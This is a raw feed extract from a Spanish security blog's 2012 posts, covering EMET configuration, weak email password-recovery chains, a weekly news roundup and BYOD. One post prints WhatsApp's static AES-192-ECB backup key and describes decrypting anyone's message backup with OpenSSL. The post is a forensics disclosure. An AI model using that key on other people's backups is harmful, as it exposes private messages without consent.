&lt;a href="http://2.bp.blogspot.com/-vBB1PKsHXG0/T2iYY8tsNnI/AAAAAAAAAPw/nmBBh9mSi4g/s1600/Configure_system.png"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5721990880956266098" src="http://2.bp.blogspot.com/-vBB1PKsHXG0/T2iYY8tsNnI/AAAAAAAAAPw/nmBBh9mSi4g/s400/Configure_system.png" style="cursor: hand; cursor: pointer; display: block; height: 220px; margin: 0px auto 10px; text-align: center; width: 400px;" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
En &lt;span style="font-weight: bold;"&gt;Configure Apps&lt;/span&gt; se configuran los binarios que queremos proteger y las mitigaciones que se aplican al mismo. Por defecto se activan todas si el SO las soporta. Las mitigaciones de seguridad que no aparecen en &lt;span style="font-weight: bold;"&gt;Configure System&lt;/span&gt;, se aplican o no en base a si están marcadas mediante el  checkbox en la lista de aplicaciones añadidas manualmente.&lt;br /&gt;
&lt;br /&gt;
Es importante tener en mente que se añaden los binarios de aplicaciones indicando la ruta completo, no sólo el nombre del binario. Por lo tanto podríamos tener dos versiones de la misma aplicación protegidas por &lt;span style="font-style: italic;"&gt;EMET&lt;/span&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://2.bp.blogspot.com/-TNyiafnPoyA/T2iYdXECnNI/AAAAAAAAAP8/EpJW_VqUuXM/s1600/Configure_apps.png"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5721990956748807378" src="http://2.bp.blogspot.com/-TNyiafnPoyA/T2iYdXECnNI/AAAAAAAAAP8/EpJW_VqUuXM/s400/Configure_apps.png" style="cursor: hand; cursor: pointer; display: block; height: 240px; margin: 0px auto 10px; text-align: center; width: 400px;" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Cuando se realiza una modificación en &lt;span style="font-weight: bold;"&gt;Configure System&lt;/span&gt; o &lt;span style="font-weight: bold;"&gt;Configure Apps&lt;/span&gt; es necesario reiniciar el sistema para aplicar los cambios.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;Configuración de seguridad mediante CLI&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Existe la posibilidad de configurar &lt;span style="font-style: italic;"&gt;EMET &lt;/span&gt;mediante CLI, de forma que se podría automatizar el proceso. La configuración mediante GUI es extremadamente útil para una sóla máquina, pero podría ser un problema para implementarlo en varias máquinas. Es aquí donde entra en juego la CLI.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://2.bp.blogspot.com/-virdboU3k8s/T2icbrl9NwI/AAAAAAAAAQI/1O9VEnMgfzU/s1600/EMET_Conf.png"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5721995325946541826" src="http://2.bp.blogspot.com/-virdboU3k8s/T2icbrl9NwI/AAAAAAAAAQI/1O9VEnMgfzU/s400/EMET_Conf.png" style="cursor: hand; cursor: pointer; display: block; height: 201px; margin: 0px auto 10px; text-align: center; width: 400px;" /&gt;&lt;/a&gt;&lt;br /&gt;
También podemos sacar partido de la posibilidad de importar y exportar la configuración en XML. Sería útil en caso de que las restantes máquinas tengan el mismo software instalado y necesiten la misma configuración de seguridad.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
----------------------------------------&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
Artículo cortesía de &lt;a href="http://damontero.wordpress.com/" target="_blank"&gt;&lt;b&gt;&lt;i&gt;David Montero&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-8512457500223656219?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/1uzUHf8Yf6I" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/1uzUHf8Yf6I/configurando-emetv21.html</link><author>noreply@blogger.com (Contribuciones)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-THDEetWWqWg/Tsuz4GeC5aI/AAAAAAAAAL4/DGwe_AlLwS4/s72-c/EMET_Logo.png" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/configurando-emetv21.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-5622703235710886244</guid><pubDate>Tue, 08 May 2012 04:23:00 +0000</pubDate><atom:updated>2012-05-08T06:23:06.857+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hotmail</category><category domain="http://www.blogger.com/atom/ns#">correo</category><category domain="http://www.blogger.com/atom/ns#">contribuciones</category><category domain="http://www.blogger.com/atom/ns#">gmail</category><category domain="http://www.blogger.com/atom/ns#">contraseñas</category><category domain="http://www.blogger.com/atom/ns#">seguridad</category><category domain="http://www.blogger.com/atom/ns#">AOL</category><category domain="http://www.blogger.com/atom/ns#">recuperación</category><category domain="http://www.blogger.com/atom/ns#">Yahoo</category><title>Debilidades en los sistemas de restitución de credenciales</title><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-1zaGb9XSi4U/T6PyTBiUJqI/AAAAAAAAALo/aMCOnMkX90g/s1600/google.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="184" src="http://3.bp.blogspot.com/-1zaGb9XSi4U/T6PyTBiUJqI/AAAAAAAAALo/aMCOnMkX90g/s320/google.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
Casi siempre cuando hablamos de Seguridad, y más aún de Seguridad Informática, es común escuchar que &lt;a href="http://www.securityartwork.es/2010/03/08/el-debil-eslabon-el-cinturon-de-seguridad-ii/" target="_blank"&gt;“una cadena es tan fuerte como su eslabón más débil”&lt;/a&gt;. Sí, es casi un cliché, pero no por eso deja de ser verdad.&lt;br /&gt;
&lt;br /&gt;
Con lo omnipresencia de las grandes empresas de servicios de correo gratuito, y con &lt;a href="http://en.wikipedia.org/wiki/List_of_Google_products" target="_blank"&gt;los servicios plus&lt;/a&gt; que cada una ofrece (e.g.: calendario, Web disk, Mensajería instantánea, etc.), es común ver cómo la gente protege paranoicamente su cuenta, ya no sólo de correo sino de servicios. Perder la cuenta de correo que usas desde la Universidad o el colegio es peor que perder &lt;strike&gt;a tu novia&lt;/strike&gt; tus tarjetas bancarias, dependiendo de cómo perdiste el acceso a tu cuenta, recuperarla podría ser más complicado que reponer las tarjetas perdidas. Por esta razón, las grandes compañías de servicio de correo electrónico gratuito como Gmail, Hotmail o Yahoo, agregan &lt;b&gt;mecanismos multifactoriales para la recuperación de la cuenta&lt;/b&gt; (e.g.: preguntas de seguridad, números telefónicos y cuentas de correo secundarias.) Ahora bien, así como agregan mecanismos varios para la recuperación de la cuenta, también fortalecen los mecanismos de ingreso porque para muchos que nos movemos en el mundo de la seguridad depender únicamente de una clave pareciera ser insuficiente, razón por la cual Gmail agrega, por ejemplo, su &lt;a href="http://www.securitybydefault.com/2012/02/autenticacion-de-doble-factor-google.html" target="_blank"&gt;doble factor de autenticación&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
A propósito de la &lt;a href="http://thehackernews.com/2012/04/yet-another-hotmail-aol-and-yahoo.html" target="_blank"&gt;reciente vulnerabilidad que se encontró en Hotmail, Yahoo y AOL&lt;/a&gt;, la cual permitía a cualquier usuario con medianos conocimientos técnicos resetear la clave de cualquiera de estas cuentas, me di a la tarea de reflexionar sobre los mecanismos disponibles para la recuperación de contraseñas en varias de las empresas más grandes que ofrecen este servicio gratuitamente. Una de las opciones que comparten prácticamente todas  ellas es la opción de envío de restitución de credenciales a través de un correo secundario previamente asociado por el usuario. El mecanismo en sí es muy lógico, si nos manejamos en un mundo virtual donde el correo es prácticamente la llave de entrada a tu(s) identidad(es) digital(es), es razonable pensar que debes tener más de una cuenta de correo habilitada, y la posibilidad de perder el acceso simultáneamente a ambas cuentas no debería ser algo tan común. No obstante, estos mecanismo de recuperación de contraseñas en términos prácticos representan otra puerta de entrada al correo, y en seguridad, entre más puertas tengas, más puertas tienes que cuidar.&lt;br /&gt;
&lt;br /&gt;
Imaginemos que un usuario A está interesado en ingresar desautorizadamente a la cuenta de un usuario B. Este usuario B tiene su cuenta de correo en Gmail y lo ampara una contraseña irrompible de 16 caracteres combinados entre números, letras y símbolos especiales. Imaginemos también que este usuario A sólo conoce algunos datos básicos del usuario B, datos como el lugar de trabajo, algunos amigos, algunas aficiones, y cualquier detalle que se pueda encontrar en un perfil descuidado de Facebook. Este usuario B tiene como cuenta secundaria asociada la cuenta de correo de su empresa y las preguntas de seguridad convencionales que cualquier usuario podría configurar. Si el usuario A prepara su ataque &lt;b&gt;descartará como primera opción hacer un ataque de fuerza bruta a Gmail&lt;/b&gt;, ya sabemos que desde hace años y con la implementación de los validadores de &lt;a href="http://es.wikipedia.org/wiki/Recaptcha" target="_blank"&gt;Recaptcha&lt;/a&gt; estos ataques se han complicado, en el caso de que aún así decida efectuarlo no le funcionará porque ya sabemos que la contraseña es robusta.&lt;br /&gt;
&lt;br /&gt;
También podría pensar en un ataque más a largo plazo &lt;b&gt;analizando la plataforma de Gmail&lt;/b&gt; haciendo recolección de información técnica, escaneo de puertos, análisis de paquetes de red, y cualquier estrategia que busque hallar debilidades en los sistemas de seguridad de Google, lo cual seguramente no le será fácil y mucho menos le garantizará el éxito de la operación.  Adivinar las preguntas de seguridad son una posibilidad, sin embargo, se requiere conocer muy bien a la víctima para poder tener acertar la respuesta, al fin de cuenta, cuando se configura la pregunta secreta siempre se está pensando en algo que sólo conozcamos nosotros, al menos debería ser así.&lt;br /&gt;
&lt;br /&gt;
Como tercera y última opción le queda &lt;b&gt;comprometer la cuenta secundaria asociada&lt;/b&gt; para ingresar de manera indirecta a la cuenta Gmail. El hecho de que lo logre o no ya es lo de menos, lo que podemos ver aquí es que la seguridad de Gmail es directamente proporcional a la seguridad de la segunda cuenta de correo electrónica asociada:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Si es una cuenta Hotmail, y créanme que un gran porcentaje de asociaciones entre cuentas para recuperación de credenciales está entre Hotmail-Gmail, la seguridad de Gmail será equivalente a la seguridad de Hotmail, &lt;a href="http://thehackernews.com/2012/04/0day-remote-password-reset.html" target="_blank"&gt;la cual se puso en evidencia hace pocos días tal como vimos&lt;/a&gt;.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Si la cuenta secundaria es de una empresa, la seguridad de la cuenta de Gmail (y todos sus servicios) será igual a la seguridad de la plataforma tecnológica de esa empresa. Podríamos seguir profundizando el análisis comentando que un gran porcentaje de las empresas que realizan sus implementaciones para correo corporativo no usan conexión &lt;a href="http://en.wikipedia.org/wiki/Secure_Socket_Layer" target="_blank"&gt;SSL&lt;/a&gt; para sus usuarios, por lo que con un ataque de &lt;a href="http://es.wikipedia.org/wiki/Ataque_Man-in-the-middle" target="_blank"&gt;MITM&lt;/a&gt; quedarían expuestas las credenciales de todas las cuentas que ingresen. Podríamos referir otro tipo de ataques también comunes como los de &lt;a href="http://en.wikipedia.org/wiki/SQL_injection" target="_blank"&gt;SQLi&lt;/a&gt; el cual afecta a sistemas de correos de empresas muy importantes en la actualidad y a través del cual también se podrían comprometer las credenciales de acceso de cualquier usuario. De igual forma &lt;b&gt;aplicarían los ataques de fuerza bruta&lt;/b&gt; para las implementaciones que carecen de Recaptcha o que no controlan el número de intentos de ingreso permitidos.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
La conclusión es que si la seguridad es un punto crítico de tu plataforma, debes pensarla en todas las perspectivas y enfoques. No sirve de nada que una empresa invierta millones en tener los &lt;a href="http://es.wikipedia.org/wiki/Sistema_de_Prevenci%C3%B3n_de_Intrusos" target="_blank"&gt;sistemas de IDS/IPS&lt;/a&gt; más robustos, los Sistemas Operativos con las últimas actualizaciones de seguridad disponibles, los sistemas de monitoreo más completos y que, la recuperación de credenciales dependan de una segunda plataforma que no controlas.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
--------------------------------------------------------------&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: right;"&gt;
&lt;i&gt;Artículo cortesía de Carlos Rondón A.&amp;nbsp;&lt;a href="http://www.twitter.com/phronimos" target="_blank"&gt;@phronimos&lt;/a&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-5622703235710886244?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/vfhHbNJjRHM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/vfhHbNJjRHM/debilidades-en-los-sistemas-de.html</link><author>noreply@blogger.com (Contribuciones)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-1zaGb9XSi4U/T6PyTBiUJqI/AAAAAAAAALo/aMCOnMkX90g/s72-c/google.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/debilidades-en-los-sistemas-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-4057915693300624512</guid><pubDate>Mon, 07 May 2012 05:36:00 +0000</pubDate><atom:updated>2012-05-08T14:33:22.801+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">whatsapp</category><category domain="http://www.blogger.com/atom/ns#">openssl</category><category domain="http://www.blogger.com/atom/ns#">cifrado</category><category domain="http://www.blogger.com/atom/ns#">android</category><category domain="http://www.blogger.com/atom/ns#">análisis forense</category><title>Descifrando el fichero msgstore.db.crypt de WhatsApp</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a class="vt-p" href="http://4.bp.blogspot.com/-Q-CIb5-WUfg/T6bIsqswt9I/AAAAAAAAG-M/llLGPT7ya0k/s1600/WhatsApp-MessengerLarge.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/-Q-CIb5-WUfg/T6bIsqswt9I/AAAAAAAAG-M/llLGPT7ya0k/s200/WhatsApp-MessengerLarge.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La base de datos de &lt;b&gt;mensajes &lt;/b&gt;de &lt;b&gt;WhatsApp &lt;/b&gt;se guarda en un fichero en &amp;nbsp;formato SQLite. En el caso de los teléfonos IOS este fichero está en la ruta: [ID de&amp;nbsp;App]/Documents/ChatStorage.sqlite y en el caso de los teléfonos Android en: /com.whatsapp/databases/msgstore.db. Este fichero está sin cifrar tal y como &lt;a class="vt-p" href="http://www.securitybydefault.com/2011/06/lo-que-no-te-cuenta-whatsapp.html"&gt;decía Yago el año pasado&lt;/a&gt;&amp;nbsp;y requiere que el teléfono este jailbreakedo para acceder a el.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En el caso de Android&amp;nbsp;además existe un fichero de backup que se almacena &amp;nbsp;en la tarjeta externa de memoria y que tampoco estaba cifrado. Esto cambió en una actualización que&amp;nbsp;sufrió&amp;nbsp;la aplicación después de los comentarios de Yago. De esta forma si se pierde el teléfono o lo roban, aunque tengan la tarjeta no podrán leer los mensajes.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por desgracia, el &lt;b&gt;cifrado &lt;/b&gt;que utiliza la aplicación (&lt;b&gt;AES-192-ECB)&lt;/b&gt;&amp;nbsp;en el &lt;b&gt;fichero de backup&lt;/b&gt; siempre la hace usando la misma key (&lt;b&gt;346a23652a46392b4d73257c67317e352e3372482177652c&lt;/b&gt;), y &lt;b&gt;ningún factor único de cada dispositivo&lt;/b&gt;, por lo que se pueden recuperar los mensajes de cualquier móvil de la misma forma y en pocos segundos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si por cualquier motivo os veis en esta situación, para &lt;b&gt;descifrar el fichero&lt;/b&gt; y acceder a la base de datos se puede hacer de forma sencilla con OpenSSL (&lt;a class="vt-p" href="http://www.openssl.org/source/"&gt;fuente&lt;/a&gt;&amp;nbsp;y &lt;a class="vt-p" href="http://www.openssl.org/related/binaries.html"&gt;binario para windows&lt;/a&gt;), con el&amp;nbsp;siguiente comando, donde tan solo hay que especificar el fichero de entrada (-in) y el de salida (-out) con los nombres que correspondan:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;script src="http://pastebin.com/embed_js.php?i=MRLK3GZy"&gt;
&lt;/script&gt;
&lt;br /&gt;
Para todos aquellos que lo quieran aún más fácil, he montado una &lt;b&gt;web &amp;nbsp;temporal&lt;/b&gt; para hacerlo &lt;b&gt;automáticamente &amp;nbsp;&lt;/b&gt;subiendo el fichero cifrado:&amp;nbsp;&lt;b&gt;&lt;a class="vt-p" href="http://www2.unsec.net/whatsapp/"&gt;http://www2.unsec.net/whatsapp/&lt;/a&gt;.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Una vez descifrado, hay que utilizar un gestor de SQLite para abrir el fichero, como por ejemplo &lt;a class="vt-p" href="http://sqliteadmin.orbmu2k.de/"&gt;SQLite Administrator&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Update 8/5/2012:&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
Los creadores de Xtract (Fabio Sangiacomo and Martina Weidner)&amp;nbsp;ya&amp;nbsp;habían&amp;nbsp;encontrado esto en &lt;b&gt;Diciembre del 2011&lt;/b&gt; y sacaron su herramienta y un excelente documento explicando como la obtuvieron:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://forum.xda-developers.com/showthread.php?p=24569917"&gt;http://forum.xda-developers.com/showthread.php?p=24569917&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://code.google.com/p/hotoloti/downloads/list"&gt;https://code.google.com/p/hotoloti/downloads/list&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://www.os3.nl/_media/2011-2012/students/ssn_project_report.pdf"&gt;https://www.os3.nl/_media/2011-2012/students/ssn_project_report.pdf&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-4057915693300624512?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/yAP1YLdNEfI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/yAP1YLdNEfI/descifrando-el-fichero-msgstoredbcrypt.html</link><author>noreply@blogger.com (Alejandro Ramos)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-Q-CIb5-WUfg/T6bIsqswt9I/AAAAAAAAG-M/llLGPT7ya0k/s72-c/WhatsApp-MessengerLarge.jpg" height="72" width="72" /><thr:total>45</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/descifrando-el-fichero-msgstoredbcrypt.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-3774398149200799416</guid><pubDate>Sun, 06 May 2012 08:00:00 +0000</pubDate><atom:updated>2012-05-06T10:00:01.952+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">secmana</category><title>Enlaces de la SECmana - 122</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s1600/informe-secmanal-banner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="88" src="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s1600/informe-secmanal-banner.jpg" width="399" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;En &lt;b&gt;Contagio&lt;/b&gt;, recopilatorio de malware, &lt;a href="http://contagiodump.blogspot.com.es/2012/05/019-speechdoc-macosxms09-027a-exploit.html"&gt;han recibido un documento en .doc&lt;/a&gt;, que resulta ser un &lt;b&gt;exploit para MS Word sobre Snow Leopard&lt;/b&gt; que aprovecha la vulnerabilidad reportada en el MS09-027. Todos los detalles técnicos de este malware se pueden encontrar en &lt;a href="http://blogs.technet.com/b/mmpc/archive/2012/04/30/an-interesting-case-of-mac-osx-malware.aspx"&gt;este enlace del Microsoft Malware Protection Center.&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Finalmente, &lt;a href="http://www.theregister.co.uk/2012/05/03/ms_kicks_dptech_off_mapp/"&gt;Microsoft ha expulsado a la empresa china&amp;nbsp;Hangzhou DPTech&lt;/a&gt; de su programa &lt;i&gt;Microsoft Active Protections Program&lt;/i&gt; por la supuesta fuga de información tras lo ocurrido con la prueba de concepto de la vulnerabilidad del RDP, la cual se filtró el un foro chino y que posteriormente denunció su creador Luigi Auriemma. El &lt;a href="http://blogs.technet.com/b/msrc/archive/2012/05/03/mapp-update-taking-action-to-decrease-risk-of-information-disclosure.aspx"&gt;anuncio oficial&lt;/a&gt; en el blog del MAPP.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;El pasado Miércoles &lt;a href="http://ompldr.org/vZGxxaQ"&gt;se publicó accidentalmente&lt;/a&gt; una &lt;b&gt;vulnerabilidad en PHP&lt;/b&gt; que &lt;a href="http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/"&gt;fue descubierta en Enero&lt;/a&gt;&amp;nbsp;por un equipo de CTF mientras participaban en NullCON, y que permitiría el acceso a información y la ejecución de código de forma remota. Sin duda se trata de una de las vulnerabilidades más importantes de lo que llevamos de año. &lt;a href="http://twitter.com/#!/chemaalonso"&gt;Chema Alonso&lt;/a&gt; y &lt;a href="https://twitter.com/#!/joseselvi"&gt;José Selvi&lt;/a&gt; han realizado unos profundos análisis sobre ella, &lt;a href="http://www.elladodelmal.com/2012/05/ejecutar-codigo-remoto-en-apache-con.html"&gt;en El Lado del Mal&lt;/a&gt; y &lt;a href="http://www.pentester.es/2012/05/explotando-php-cgi.html"&gt;Pentester.es&lt;/a&gt; respectivamente.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.seguridadapple.com/2012/05/kon-boot-para-mac-os-x-de-64-bits.html"&gt;En Seguridad Apple&lt;/a&gt;, se hacen eco de la liberación de una &lt;a href="http://www.piotrbania.com/all/kon-boot/konboot4mac.html"&gt;versión de &lt;b&gt;Kon-Boot para sistemas Mac OS X de 64 bits&lt;/b&gt;&lt;/a&gt;, que permite la creación de un usuario administrador en caso de olvido.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Desde &lt;b&gt;48Bits&lt;/b&gt; nos deleitan con otro nuevo interesante post, esta vez de &lt;a href="http://www.twitter.com/gabrielgonzalez"&gt;Gabriel González&lt;/a&gt;, sobre &lt;a href="http://blog.48bits.com/2012/05/02/grasias-por-la-wifi-prim/"&gt;&lt;b&gt;cómo jugueteó con un router ADSL&amp;nbsp;Comtrend AR-5381u&lt;/b&gt;&lt;/a&gt; distribuido por Jazztel para conseguir la ejecución de comandos y la administración remota de una manera más sencilla.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://twitter.com/#!/roman_soft/status/196708589287645185"&gt;RomanSoft desde su cuenta de twitter&lt;/a&gt; proporciona un &lt;a href="http://t.co/n6JIiNdz"&gt;enlace que recopila casi todos los &lt;b&gt;ficheros&lt;/b&gt;&lt;/a&gt;&lt;b&gt; del &lt;a href="http://plaidctf.com/"&gt;CTF de plaid&lt;/a&gt;&lt;/b&gt;, concurso organizado por los PPP (&lt;i&gt;&lt;a href="http://ppp.cylab.cmu.edu/wordpress/"&gt;Plaid Parliament of Pwning&lt;/a&gt;&lt;/i&gt;)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;La actriz Marta Torné&lt;/b&gt;, protagonista de series como El Internado y Los Protegidos, &lt;b&gt;&lt;a href="http://www.formulatv.com/noticias/24834/hackean-cuenta-twitter-marta-torne-pierde-todos-followers/"&gt;sufre un &lt;i&gt;hackeo&lt;/i&gt; de su cuenta de twitter&lt;/a&gt;,&lt;/b&gt; perdiendo todos sus seguidores (más de 130.000). No sólo los famosos internacionales iban a tener problemas con sus twitters....&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;En Una al día, &lt;a href="http://unaaldia.hispasec.com/2012/05/nueva-vulnerabilidad-permite-elevar.html"&gt;&lt;b&gt;nueva vulnerabilidad (CVE-2012-2111) que permite la elevación de privilegios en SAMBA&lt;/b&gt;&lt;/a&gt;.&amp;nbsp;Si hace dos semanas se informaba de una grave vulnerabilidad remota que afectaría a multitud de dispositivos (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182"&gt;CVE-2012-1182&lt;/a&gt;), el equipo de Samba acaba de descubrir otro grave fallo (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2111"&gt;CVE-2012-2111&lt;/a&gt;) que afectaría a los usuarios de las versiones 3.4.x hasta la 3.6.4 inclusive.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.blogger.com/"&gt;&lt;span id="goog_1739499605"&gt;&lt;/span&gt;Aviso de seguridad VMSA-2012-0009&lt;span id="goog_1739499606"&gt;&lt;/span&gt;&lt;/a&gt;&amp;nbsp;que incluye 5 &lt;b&gt;vulnerabilidades críticas que afectan a&amp;nbsp;VMware Workstation, Player, ESXi y ESX.&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-3774398149200799416?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/Z8UD_Ehuilo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/Z8UD_Ehuilo/enlaces-de-la-secmana-122.html</link><author>noreply@blogger.com (José A. Guasch)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_fWA7DVpD2eo/TG6clsxg-qI/AAAAAAAAAek/nE1WBc8GrT0/s72-c/informe-secmanal-banner.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/enlaces-de-la-secmana-122.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-4824248687998045047</guid><pubDate>Sat, 05 May 2012 06:00:00 +0000</pubDate><atom:updated>2012-05-05T08:00:01.478+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">modas</category><category domain="http://www.blogger.com/atom/ns#">tabletas</category><category domain="http://www.blogger.com/atom/ns#">opinión</category><category domain="http://www.blogger.com/atom/ns#">actualidad</category><category domain="http://www.blogger.com/atom/ns#">ipad</category><title>Introducción al BYOD</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-3ipsVLxZRE0/T6P5Adtsk3I/AAAAAAAAG9k/o2S-eGjntdM/s1600/ipad.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="249" src="http://4.bp.blogspot.com/-3ipsVLxZRE0/T6P5Adtsk3I/AAAAAAAAG9k/o2S-eGjntdM/s320/ipad.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En SecurityByDefault estamos en la cresta de la ola, y para estarlo hay que subirse a todas las tendencias absurdas y términos comerciales/marketinianos del mercado. El último que suena es &lt;b&gt;BYOD&lt;/b&gt;. Las siglas de "Bring Your Own Device", que traducido a español, tiene que ser algo similar a "&lt;b&gt;Cómpratelo tú, que a nosotros nos da la risa&lt;/b&gt;", y que define el suceso que ocurre cuando el hardware&amp;nbsp;portátil&amp;nbsp;te lo traes de casa y es de tu propiedad. Como las famosas tabletas o&amp;nbsp;teléfonos&amp;nbsp;inteligentes.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Bajo BYOD ya empiezan a verse &lt;a href="http://www.securityweek.com/enterasys-networks-launches-byod-management-appliance"&gt;los primeros productos&lt;/a&gt; que facilitan su integración en las redes de grandes compañías, asegurando que cumplen con los requisitos de seguridad del resto de sistemas y que las mayores amenazas de terminales móviles como son la fuga de información, robo físico, malware, etcétera, quedan controladas.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
